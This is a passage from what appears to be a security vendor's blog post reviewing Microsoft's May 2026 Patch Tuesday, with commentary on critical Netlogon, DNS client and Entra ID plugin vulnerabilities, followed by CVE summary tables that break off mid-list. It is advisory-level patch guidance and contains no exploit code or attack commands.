<content:encoded><![CDATA[<p><span>Microsoft is publishing 137 vulnerabilities on </span><a href="https://msrc.microsoft.com/update-guide/releaseNote/2026-May"><span>May 2026 Patch Tuesday</span></a><span>. Microsoft is not aware of exploitation in the wild or public disclosure for any of these vulnerabilities. So far this month, Microsoft has provided patches to address 133 browser vulnerabilities, which are not included in the Patch Tuesday count above.</span></p><h3><span>Windows Netlogon: critical RCE</span></h3><p><span>Anyone responsible for securing a domain controller should prioritize remediation of </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-41089"><span>CVE-2026-41089</span></a><span>, which is a critical stack-based buffer overflow in Windows Netlogon with a CVSS v3 base score of 9.8. Exploitation leads to execution in the context of the Netlogon service, so that’s SYSTEM privileges on the domain controller. For most pentesters, that’s the point at which the customer report more or less writes itself. No privileges or user interaction are required, and attack complexity is low, which suggests that creation of a reliable exploit might not be especially difficult for anyone with knowledge of the specific mechanism.</span></p><p><span>Microsoft assesses exploitation as less likely, but since those exploitability assessments are provided without an accompanying explanation, it’s not clear how much reassurance defenders should take. Anyone who remembers the much-discussed </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472"><span>CVE-2020-1472</span></a><span> (aka ZeroLogon) back in 2020 will note that </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-41089"><span>CVE-2026-41089</span></a><span> offers an attacker more immediate control of a domain controller. Patches are available for all versions of Windows Server from 2012 onwards.</span></p><h3><span>Windows DNS Client: critical RCE</span></h3><p><span>An attacker looking for a master key for Windows assets will pay attention to </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-41096"><span>CVE-2026-41096</span></a><span>, a critical RCE in the Windows DNS client implementation. A modern computer talks to DNS the way a child in the back of a car asks “are we there yet?” The variable and complex structure of DNS responses means that DNS client implementations are also complex and thus prone to flaws. Microsoft assesses exploitation as less likely, and we can hope that modern mitigations such as heap address randomization and optional-but-recommended encrypted channel DNS will make weaponization significantly more challenging by putting barriers across specific paths to exploitation. The DNS client on Windows runs as the NetworkService role, rather than SYSTEM, but a foothold is a foothold, and skilled attackers expect to chain exploits together.</span></p><h3><span>JIRA/Confluence Entra ID auth plugin: critical EoP</span></h3><p><span>If you’re still self-hosting Atlassian JIRA or Confluence and relying on the Microsoft Entra ID authentication plugin, you’ll want to know about </span><a href="https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2026-41103"><span>CVE-2026-41103</span></a><span>. This critical elevation of privilege vulnerability allows an unauthorized attacker to impersonate an existing user by presenting forged credentials, thus bypassing Entra ID. Microsoft expects that exploitation is more likely. Even if you can’t always find what you want on the corporate Confluence, a motivated attacker probably will. Curiously, the patch links on the advisory lead to older versions of the plugins published in 2024.</span></p><h3><span>Microsoft WARP team</span></h3><p><span>Microsoft’s WARP team is credited with multiple critical vulnerabilities today, after making their first appearance in MSRC advisory acknowledgements in last month’s Patch Tuesday. We can speculate that they likely know a great deal about the current state of AI-powered vulnerability research as it applies to Microsoft products.</span></p><h3><span>Microsoft lifecycle update</span></h3><p><span>There are no significant Microsoft product lifecycle changes this month. Microsoft .NET 9 STS (Standard Term Support, as distinct from Long Term Support) was originally scheduled to move past the end of support in May 2026, but late last year, Microsoft </span><a href="https://devblogs.microsoft.com/dotnet/dotnet-sts-releases-supported-for-24-months/#:~:text=To%20solve%20this%20problem%2C%20we,Original%20Release%20Date"><span>granted a six-month extension</span></a><span>, so that </span><a href="https://learn.microsoft.com/en-us/lifecycle/products/microsoft-net-and-net-core"><span>.NET 9 STS</span></a><span> now reaches end of support on November 10, 2026.</span></p><h2>Summary charts</h2><h2></h2><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt818426e9f5e515fd/6a03c94272d70a4176278519/2026-05-vuln_count_component.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt818426e9f5e515fd/6a03c94272d70a4176278519/2026-05-vuln_count_component.png" data-sys-asset-uid="blt818426e9f5e515fd" data-sys-asset-filename="2026-05-vuln_count_component.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" data-sys-asset-position="center" sys-style-type="display"></figure><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte4570cc11c0293b3/6a03c9427575976c98e852e2/2026-05-vuln_count_impact.png" alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blte4570cc11c0293b3/6a03c9427575976c98e852e2/2026-05-vuln_count_impact.png" data-sys-asset-uid="blte4570cc11c0293b3" data-sys-asset-filename="2026-05-vuln_count_impact.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A bar chart showing vulnerability count by impact for Microsoft Patch Tuesday 2026-May" data-sys-asset-position="center" sys-style-type="display"></figure><p></p><p></p><figure><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted7c42c87882c725/6a03c94265263cb3d78617de/2026-05-vuln_count_impact-component-heatmap.png" alt="A heatmap showing distribution of impact type by component for Microsoft Patch Tuesday 2026-May" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="A heatmap showing distribution of impact type by component for Microsoft Patch Tuesday 2026-May" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blted7c42c87882c725/6a03c94265263cb3d78617de/2026-05-vuln_count_impact-component-heatmap.png" data-sys-asset-uid="blted7c42c87882c725" data-sys-asset-filename="2026-05-vuln_count_impact-component-heatmap.png" data-sys-asset-contenttype="image/png" data-sys-asset-alt="A heatmap showing distribution of impact type by component for Microsoft Patch Tuesday 2026-May" data-sys-asset-position="center" sys-style-type="display"></figure><p></p><h2>Summary tables</h2><p></p><h3>Apps vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26129">CVE-2026-26129</a></td><td><p>M365 Copilot Information Disclosure Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-26164">CVE-2026-26164</a></td><td><p>M365 Copilot Information Disclosure Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41614">CVE-2026-41614</a></td><td><p>M365 Copilot for Desktop Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41100">CVE-2026-41100</a></td><td><p>Microsoft 365 Copilot for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>4.4</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42832">CVE-2026-42832</a></td><td><p>Microsoft Office Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.7</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41101">CVE-2026-41101</a></td><td><p>Microsoft Word for Android Spoofing Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>7.1</p></td></tr></tbody></table><h3>Azure vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35435">CVE-2026-35435</a></td><td><p>Azure AI Foundry Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>8.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-35428">CVE-2026-35428</a></td><td><p>Azure Cloud Shell Spoofing Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.6</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32207">CVE-2026-32207</a></td><td><p>Azure Machine Learning Notebook Spoofing Vulnerability</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p>8.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33109">CVE-2026-33109</a></td><td><p>Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33844">CVE-2026-33844</a></td><td><p>Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.0</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41105">CVE-2026-41105</a></td><td><p>Azure Monitor Action Group Notification System Elevation of Privilege Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>8.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40379">CVE-2026-40379</a></td><td><p>Microsoft Enterprise Security Token Service (ESTS) Spoofing Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>9.3</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-34327">CVE-2026-34327</a></td><td><p>Microsoft Partner Center Spoofing Vulnerability</p></td><td><p>N/A</p></td><td><p>No</p></td><td><p>8.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-40381">CVE-2026-40381</a></td><td><p>Azure Connected Machine Agent Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42823">CVE-2026-42823</a></td><td><p>Azure Logic Apps Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>9.9</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33833">CVE-2026-33833</a></td><td><p>Azure Machine Learning Notebook Spoofing Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.2</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-32204">CVE-2026-32204</a></td><td><p>Azure Monitor Agent Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>7.8</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-42830">CVE-2026-42830</a></td><td><p>Azure Monitor Agent Metrics Extension Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>6.5</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-33117">CVE-2026-33117</a></td><td><p>Azure SDK for Java Security Feature Bypass Vulnerability</p></td><td><p>Exploitation Unlikely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41103">CVE-2026-41103</a></td><td><p>Microsoft SSO Plugin for Jira &amp; Confluence Elevation of Privilege Vulnerability</p></td><td><p>Exploitation More Likely</p></td><td><p>No</p></td><td><p>9.1</p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-41086">CVE-2026-41086</a></td><td><p>Windows Admin Center in Azure Portal Elevation of Privilege Vulnerability</p></td><td><p>Exploitation Less Likely</p></td><td><p>No</p></td><td><p>8.8</p></td></tr></tbody></table><h3>Browser vulnerabilities</h3><table><thead><tr><th><p>CVE</p></th><th><p>Title</p></th><th><p>Exploitation status</p></th><th><p>Publicly disclosed?</p></th><th><p>CVSS v3 base score</p></th></tr></thead><tbody><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7898">CVE-2026-7898</a></td><td><p>Chromium: CVE-2026-7898 Use after free in Chromoting</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7899">CVE-2026-7899</a></td><td><p>Chromium: CVE-2026-7899 Out of bounds read and write in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7900">CVE-2026-7900</a></td><td><p>Chromium: CVE-2026-7900 Heap buffer overflow in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7901">CVE-2026-7901</a></td><td><p>Chromium: CVE-2026-7901 Use after free in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7902">CVE-2026-7902</a></td><td><p>Chromium: CVE-2026-7902 Out of bounds memory access in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7903">CVE-2026-7903</a></td><td><p>Chromium: CVE-2026-7903 Integer overflow in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7904">CVE-2026-7904</a></td><td><p>Chromium: CVE-2026-7904 Out of bounds read in Fonts</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7906">CVE-2026-7906</a></td><td><p>Chromium: CVE-2026-7906 Use after free in SVG</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7907">CVE-2026-7907</a></td><td><p>Chromium: CVE-2026-7907 Use after free in DOM</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7908">CVE-2026-7908</a></td><td><p>Chromium: CVE-2026-7908 Use after free in Fullscreen</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7909">CVE-2026-7909</a></td><td><p>Chromium: CVE-2026-7909 Inappropriate implementation in ServiceWorker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7910">CVE-2026-7910</a></td><td><p>Chromium: CVE-2026-7910 Use after free in Views</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7911">CVE-2026-7911</a></td><td><p>Chromium: CVE-2026-7911 Use after free in Aura</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7914">CVE-2026-7914</a></td><td><p>Chromium: CVE-2026-7914 Type Confusion in Accessibility</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7916">CVE-2026-7916</a></td><td><p>Chromium: CVE-2026-7916 Insufficient data validation in InterestGroups</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7917">CVE-2026-7917</a></td><td><p>Chromium: CVE-2026-7917 Use after free in Fullscreen</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7918">CVE-2026-7918</a></td><td><p>Chromium: CVE-2026-7918 Use after free in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7919">CVE-2026-7919</a></td><td><p>Chromium: CVE-2026-7919 Use after free in Aura</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7920">CVE-2026-7920</a></td><td><p>Chromium: CVE-2026-7920 Use after free in Skia</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7921">CVE-2026-7921</a></td><td><p>Chromium: CVE-2026-7921 Use after free in Passwords</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7922">CVE-2026-7922</a></td><td><p>Chromium: CVE-2026-7922 Use after free in ServiceWorker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7923">CVE-2026-7923</a></td><td><p>Chromium: CVE-2026-7923 Out of bounds write in Skia</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7924">CVE-2026-7924</a></td><td><p>Chromium: CVE-2026-7924 Uninitialized Use in Dawn</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7925">CVE-2026-7925</a></td><td><p>Chromium: CVE-2026-7925 Use after free in Chromoting</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7926">CVE-2026-7926</a></td><td><p>Chromium: CVE-2026-7926 Use after free in PresentationAPI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7927">CVE-2026-7927</a></td><td><p>Chromium: CVE-2026-7927 Type Confusion in Runtime</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7928">CVE-2026-7928</a></td><td><p>Chromium: CVE-2026-7928 Use after free in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7929">CVE-2026-7929</a></td><td><p>Chromium: CVE-2026-7929 Use after free in MediaRecording</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7930">CVE-2026-7930</a></td><td><p>Chromium: CVE-2026-7930 Insufficient validation of untrusted input in Cookies</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7932">CVE-2026-7932</a></td><td><p>Chromium: CVE-2026-7932 Insufficient policy enforcement in Downloads</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7933">CVE-2026-7933</a></td><td><p>Chromium: CVE-2026-7933 Out of bounds read in WebCodecs</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7934">CVE-2026-7934</a></td><td><p>Chromium: CVE-2026-7934 Insufficient validation of untrusted input in Popup Blocker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7935">CVE-2026-7935</a></td><td><p>Chromium: CVE-2026-7935 Inappropriate implementation in Speech</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7936">CVE-2026-7936</a></td><td><p>Chromium: CVE-2026-7936 Object lifecycle issue in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7937">CVE-2026-7937</a></td><td><p>Chromium: CVE-2026-7937 Insufficient policy enforcement in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7938">CVE-2026-7938</a></td><td><p>Chromium: CVE-2026-7938 Use after free in CSS</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7939">CVE-2026-7939</a></td><td><p>Chromium: CVE-2026-7939 Inappropriate implementation in SanitizerAPI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7940">CVE-2026-7940</a></td><td><p>Chromium: CVE-2026-7940 Use after free in V8</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7942">CVE-2026-7942</a></td><td><p>Chromium: CVE-2026-7942 Integer overflow in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7943">CVE-2026-7943</a></td><td><p>Chromium: CVE-2026-7943 Insufficient validation of untrusted input in ANGLE</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7944">CVE-2026-7944</a></td><td><p>Chromium: CVE-2026-7944 Insufficient validation of untrusted input in Persistent Cache</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7945">CVE-2026-7945</a></td><td><p>Chromium: CVE-2026-7945 Insufficient validation of untrusted input in COOP</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7946">CVE-2026-7946</a></td><td><p>Chromium: CVE-2026-7946 Insufficient policy enforcement in WebUI</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7947">CVE-2026-7947</a></td><td><p>Chromium: CVE-2026-7947 Insufficient validation of untrusted input in Network</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7948">CVE-2026-7948</a></td><td><p>Chromium: CVE-2026-7948 Race in Chromoting</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7949">CVE-2026-7949</a></td><td><p>Chromium: CVE-2026-7949 Out of bounds read in Skia</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7950">CVE-2026-7950</a></td><td><p>Chromium: CVE-2026-7950 Out of bounds read and write in GFX</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7951">CVE-2026-7951</a></td><td><p>Chromium: CVE-2026-7951 Out of bounds write in WebRTC</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7952">CVE-2026-7952</a></td><td><p>Chromium: CVE-2026-7952 Insufficient policy enforcement in Extensions</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7953">CVE-2026-7953</a></td><td><p>Chromium: CVE-2026-7953 Insufficient validation of untrusted input in Omnibox</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7954">CVE-2026-7954</a></td><td><p>Chromium: CVE-2026-7954 Race in Shared Storage</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7955">CVE-2026-7955</a></td><td><p>Chromium: CVE-2026-7955 Uninitialized Use in GPU</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7956">CVE-2026-7956</a></td><td><p>Chromium: CVE-2026-7956 Use after free in Navigation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7957">CVE-2026-7957</a></td><td><p>Chromium: CVE-2026-7957 Out of bounds write in Media</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7958">CVE-2026-7958</a></td><td><p>Chromium: CVE-2026-7958 Inappropriate implementation in ServiceWorker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7959">CVE-2026-7959</a></td><td><p>Chromium: CVE-2026-7959 Inappropriate implementation in Navigation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7960">CVE-2026-7960</a></td><td><p>Chromium: CVE-2026-7960 Race in Speech</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7961">CVE-2026-7961</a></td><td><p>Chromium: CVE-2026-7961 Insufficient validation of untrusted input in Permissions</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7962">CVE-2026-7962</a></td><td><p>Chromium: CVE-2026-7962 Insufficient policy enforcement in DirectSockets</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7963">CVE-2026-7963</a></td><td><p>Chromium: CVE-2026-7963 Inappropriate implementation in ServiceWorker</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7964">CVE-2026-7964</a></td><td><p>Chromium: CVE-2026-7964 Insufficient validation of untrusted input in FileSystem</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7965">CVE-2026-7965</a></td><td><p>Chromium: CVE-2026-7965 Insufficient validation of untrusted input in DevTools</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7966">CVE-2026-7966</a></td><td><p>Chromium: CVE-2026-7966 Insufficient validation of untrusted input in SiteIsolation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7967">CVE-2026-7967</a></td><td><p>Chromium: CVE-2026-7967 Insufficient validation of untrusted input in Navigation</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7968">CVE-2026-7968</a></td><td><p>Chromium: CVE-2026-7968 Insufficient validation of untrusted input in CORS</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7969">CVE-2026-7969</a></td><td><p>Chromium: CVE-2026-7969 Integer overflow in Network</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a href="https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2026-7970">CVE-2026-7970</a></td><td><p>Chromium: CVE-2026-7970 Use after free in TopChrome</p></td><td><p>n/a</p></td><td><p>No</p></td><td><p></p></td></tr><tr><td><a 